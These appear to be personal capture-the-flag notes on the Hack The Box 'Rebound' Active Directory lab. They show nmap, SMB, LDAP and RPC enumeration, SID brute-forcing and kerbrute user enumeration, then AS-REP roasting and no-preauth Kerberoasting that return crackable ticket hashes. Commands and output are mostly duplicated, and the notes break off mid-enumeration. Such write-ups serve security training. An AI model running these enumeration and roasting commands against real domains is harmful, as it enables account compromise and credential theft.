Rebound (AD)
NMAP:
# Nmap 7.93 scan initiated Mon Nov 20 15:20:29 2023 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49687,49688,49692,49708,49711,49717,49733 -Pn -n -oN allports 10.10.11.231 Nmap scan report for 10.10.11.231 Host is up (0.083s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-21 03:20:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.rebound.htb | Not valid before: 2023-08-25T22:48:10 |_Not valid after: 2024-08-24T22:48:10 |_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) |_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.rebound.htb | Not valid before: 2023-08-25T22:48:10 |_Not valid after: 2024-08-24T22:48:10 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.rebound.htb | Not valid before: 2023-08-25T22:48:10 |_Not valid after: 2024-08-24T22:48:10 |_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) |_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.rebound.htb | Not valid before: 2023-08-25T22:48:10 |_Not valid after: 2024-08-24T22:48:10 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49688/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC 49711/tcp open msrpc Microsoft Windows RPC 49717/tcp open msrpc Microsoft Windows RPC 49733/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2023-11-21T03:21:35 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled and required |_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Nov 20 15:21:41 2023 -- 1 IP address (1 host up) scanned in 72.64 seconds
# Nmap 7.93 scan initiated Mon Nov 20 15:20:29 2023 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49687,49688,49692,49708,49711,49717,49733 -Pn -n -oN allports 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-21 03:20:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
49733/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-11-21T03:21:35
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 20 15:21:41 2023 -- 1 IP address (1 host up) scanned in 72.64 secondsANON RDP
rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDANON LDAP
ldapsearch -H ldap://rebound.htb -x 'DC=rebound,DC=htb' # extended LDIF # # LDAPv3 # base <> (default) with scope subtree # filter: DC=rebound,DC=htb # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 # numResponses: 1
ldapsearch -H ldap://rebound.htb -x 'DC=rebound,DC=htb'
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: DC=rebound,DC=htb
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
SMB NULL
cme smb rebound.htb -u '' -p '' --shares SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [+] rebound.htb\: SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
cme smb rebound.htb -u '' -p '' --shares
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
i did not needed to user kerbrute, because there was anonymous login on the smb, and even if i could not dump the users, i could use other tools to dumpo them
SMB ANON
me smb 10.10.11.231 -u 'fkafkafk' -p '' --users SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound .htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [+] rebound.htb\fkafkafk: SMB 10.10.11.231 445 DC01 [*] Trying to dump local users with SAMRPC protocol
me smb 10.10.11.231 -u 'fkafkafk' -p '' --users
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound
.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\fkafkafk:
SMB 10.10.11.231 445 DC01 [*] Trying to dump local users with SAMRPC protocolDUMP USERS AND GROUPS BY BRUTEFORCING SID
lookupsid.py "REBOUND"/Guest@"rebound.htb" 20000 -no-pass Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Brute forcing SIDs at rebound.htb [*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: rebound\Administrator (SidTypeUser) 501: rebound\Guest (SidTypeUser) 502: rebound\krbtgt (SidTypeUser) 512: rebound\Domain Admins (SidTypeGroup) 513: rebound\Domain Users (SidTypeGroup) 514: rebound\Domain Guests (SidTypeGroup) 515: rebound\Domain Computers (SidTypeGroup) 516: rebound\Domain Controllers (SidTypeGroup) 517: rebound\Cert Publishers (SidTypeAlias) 518: rebound\Schema Admins (SidTypeGroup) 519: rebound\Enterprise Admins (SidTypeGroup) 520: rebound\Group Policy Creator Owners (SidTypeGroup) 521: rebound\Read-only Domain Controllers (SidTypeGroup) 522: rebound\Cloneable Domain Controllers (SidTypeGroup) 525: rebound\Protected Users (SidTypeGroup) 526: rebound\Key Admins (SidTypeGroup) 527: rebound\Enterprise Key Admins (SidTypeGroup) 553: rebound\RAS and IAS Servers (SidTypeAlias) 571: rebound\Allowed RODC Password Replication Group (SidTypeAlias) 572: rebound\Denied RODC Password Replication Group (SidTypeAlias) 1000: rebound\DC01$ (SidTypeUser) 1101: rebound\DnsAdmins (SidTypeAlias) 1102: rebound\DnsUpdateProxy (SidTypeGroup) 1951: rebound\ppaul (SidTypeUser) 2952: rebound\llune (SidTypeUser) 3382: rebound\fflock (SidTypeUser) 5277: rebound\jjones (SidTypeUser) 5569: rebound\mmalone (SidTypeUser) 5680: rebound\nnoon (SidTypeUser) 7681: rebound\ldap_monitor (SidTypeUser) 7682: rebound\oorend (SidTypeUser) 7683: rebound\ServiceMgmt (SidTypeGroup) 7684: rebound\winrm_svc (SidTypeUser) 7685: rebound\batch_runner (SidTypeUser) 7686: rebound\tbrady (SidTypeUser) 7687: rebound\delegator$ (SidTypeUser)
lookupsid.py "REBOUND"/Guest@"rebound.htb" 20000 -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)
DIG PORT 53
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> any @10.10.11.231 rebound.htb ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30411 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4000 ;; QUESTION SECTION: ;rebound.htb. IN ANY ;; ANSWER SECTION: rebound.htb. 600 IN A 10.10.11.231 rebound.htb. 3600 IN NS dc01.rebound.htb. rebound.htb. 3600 IN SOA dc01.rebound.htb. hostmaster.rebound.htb. 141 900 600 86400 3600 ;; ADDITIONAL SECTION: dc01.rebound.htb. 3600 IN A 10.10.11.231 ;; Query time: 66 msec ;; SERVER: 10.10.11.231#53(10.10.11.231) (TCP) ;; WHEN: Mon Nov 20 15:37:59 EST 2023 ;; MSG SIZE rcvd: 138
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> any @10.10.11.231 rebound.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30411
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;rebound.htb. IN ANY
;; ANSWER SECTION:
rebound.htb. 600 IN A 10.10.11.231
rebound.htb. 3600 IN NS dc01.rebound.htb.
rebound.htb. 3600 IN SOA dc01.rebound.htb. hostmaster.rebound.htb. 141 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.rebound.htb. 3600 IN A 10.10.11.231
;; Query time: 66 msec
;; SERVER: 10.10.11.231#53(10.10.11.231) (TCP)
;; WHEN: Mon Nov 20 15:37:59 EST 2023
;; MSG SIZE rcvd: 138Nothing to much interesting, so i used huge usenrmaes wordlist to enum valid users on the domian, and found some of them after a while
VALID USERNAMES
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 16:02:56 > Using KDC(s):
2023/11/20 16:02:56 > 10.10.11.231:88
2023/11/20 16:02:56 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: jjones@rebound.htb
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 16:02:56 > Using KDC(s):
2023/11/20 16:02:56 > 10.10.11.231:88
2023/11/20 16:02:56 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: jjones@rebound.htb
try to check if any user has the do not requiere pre auth setted , and got 1, but i could not crakc the hash
GetNPUsers.py rebound.htb/ -usersfile pos_users -dc-ip 10.10.11.231 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$jjones@REBOUND.HTB:5426e0457614f99a6c79521c19701959$8738782dd7a6cfb29a480b7ff70f0d4c1177c7359bcc46b83948e69252574b29836bec24abd855d3e6c387bd94628b3b39c380b2347822d34e18f0cf79916e4777cbc82462def86c098d842fe5a2353904f0009586210cf225006abe1e91549d682c1ddb1be1b1779ff761fb7b806558012db927e675ff19a6f1fefac3fa3d16c0f10c11dd579873553a497e80c9c8d289bd0e720df86d77e9e9222d10b9291f0e4ced757b71f7a8b13a8a543d06139925734aba9e2b76e652a618e52cd4925a8b8f45fe87e7675fdd4deb58b9264997d0eac0ddb68d108c8d7fe35d164a99f1536c003f5442b684eed1 [-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
GetNPUsers.py rebound.htb/ -usersfile pos_users -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:5426e0457614f99a6c79521c19701959$8738782dd7a6cfb29a480b7ff70f0d4c1177c7359bcc46b83948e69252574b29836bec24abd855d3e6c387bd94628b3b39c380b2347822d34e18f0cf79916e4777cbc82462def86c098d842fe5a2353904f0009586210cf225006abe1e91549d682c1ddb1be1b1779ff761fb7b806558012db927e675ff19a6f1fefac3fa3d16c0f10c11dd579873553a497e80c9c8d289bd0e720df86d77e9e9222d10b9291f0e4ced757b71f7a8b13a8a543d06139925734aba9e2b76e652a618e52cd4925a8b8f45fe87e7675fdd4deb58b9264997d0eac0ddb68d108c8d7fe35d164a99f1536c003f5442b684eed1
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
but knowing that the user was able to request tikets without password, i could try an asreproasteable attakc by requesting a tgt as that user for the different services or even other users on the domain. first i tried with the users that i had, but no luck, but then by reading in foros, found that there was another user called ldap_monitor which it would be impossible to find in wordlists, so i added that iser and checked it if was valid, and it was
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 17:07:08 > Using KDC(s):
2023/11/20 17:07:08 > 10.10.11.231:88
2023/11/20 17:07:08 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: ldap_monitor@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: jjones@rebound.htb
20
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 17:07:08 > Using KDC(s):
2023/11/20 17:07:08 > 10.10.11.231:88
2023/11/20 17:07:08 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: ldap_monitor@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: jjones@rebound.htb
20
knwoing that the user was valid, i tried the same attack by requesting tgt as the user jjones based on the new wordlists of usernames
GetUserSPNs.py -no-preauth 'jjones' -usersfile pos_users -dc-host "10.10.11.231" -request rebound.htb/ Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [-] Principal: administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$cb2f79a35a11c3a81cacd597$be23923aa136c2139a8a5101885302a72dcc522abf321ee8e787b6d343f5d733de09e0b29d6a2fb1110b96cfc4f6241aa545c3531c8830c9d5986766b12697df43a8c98716fe9b0e248db57d1fca1b01350fd591680a635fe9fd3e5bc97687c04200be3b3881ea5434edc00d091b4e55be19c8448807764de83680f0ff12e2ece49bc15380683248d9da22abd39faf80ad8e3eba92f11d35301f148a059c32aa73cbb69e432b6c2d2934c72c3ee522aac46585237160a88d29557dcd986a7be1b4788cfab04abb2787df885cc7838035be931180f58aac1acba6249a59669174ee4375859d82bcff7b6b62898eb283089ebc495d526775ca0859e7aefb834f360a63aecccbec9e4bd356a08b6c4fc4fdbcecc8f1d020b1db7c5117b7a93af2d7cd86707daae28832072831068fdbf9b5326174b450df7c33adce323140cd363c422821be7724f836b3a3c896052ac23d1b273ce247422d95a2c1563a32260150c4d831458077ee4186ccaa466d98c455609f2e514bbde5f2e7a47d3432019c1ee886d261aab59493b08a7170473f3fe59a3c4b4c5fc9d1579cc395e20ccafeaf0ee8aa03e0488aff7c1a3f4a73cecf7c58dcf4ab98d18dd296056946740c56a54528f3c5978260d95920070b7d2c35466cdc9f26125fcc9960a40d07f78447e6eeceba3096e6ae1979a29c88e9c6e62d8ed0a35cb33a8640772414f798c7be54e1908edbd492d01bef2fa9575fd8cebca993c44ffe62c621e6f3d44b2c34ff6c25259304ae3c16f9195a556b2be06db7215b99714bdda6f1dbf9635c0af7768f1c61faadd4422c49ea98022dcc7d4f33258f1f6ccbb29a063ad163ad7cb11c4cf076bf3dcc9ba85f0e6ab14211aef798a8138ba2f3ff6f5bbc805f1df3c3c8ae30cc14d19377f6bf145cfb219009284e0c3828cde29058b0f9c07795dcfb22b5070c51d29db01c4a14be6692444565fdfdd14c6e75111cd8aa3edc19d44185658ffa380837cc6eccacfc5bce4e3ceded49edd462b5f2a1071844c89606aecc5f8a08fc48c86c281d53020e8bf1ddd127b4083723862a2cecdf42ef3a4cf6ac4e9203440e8350abf306abc281bc9cc9957e936b914a63aead1f5fa7c3602f84d2df794bcaa8fb2bbd0539bfa3c4018c2e98d92649a062029ee639633099d2f5bdd43c254dd5eba7d0d4365911077fa98d477489092fe6eb7edab1d3258b318fecca951da7f67d8932ecde98370f943c46deb16a873820b6f11e8c568dd65b79fabe506d7841a3d904c703099491b43dac9d1db53a4998cf4f511d5ead270dd242c409d48eed3ded16244a5168a73c3c2ac3ba7f051539286310c1a1de139019a4fb3f2b12b5a26284499f [-] Principal: ServiceMgmt - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: winrm - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: ldap - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: ldap_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: rpc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: rpc_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: smb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Servr not found in Kerberos database) [-] Principal: smb_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) 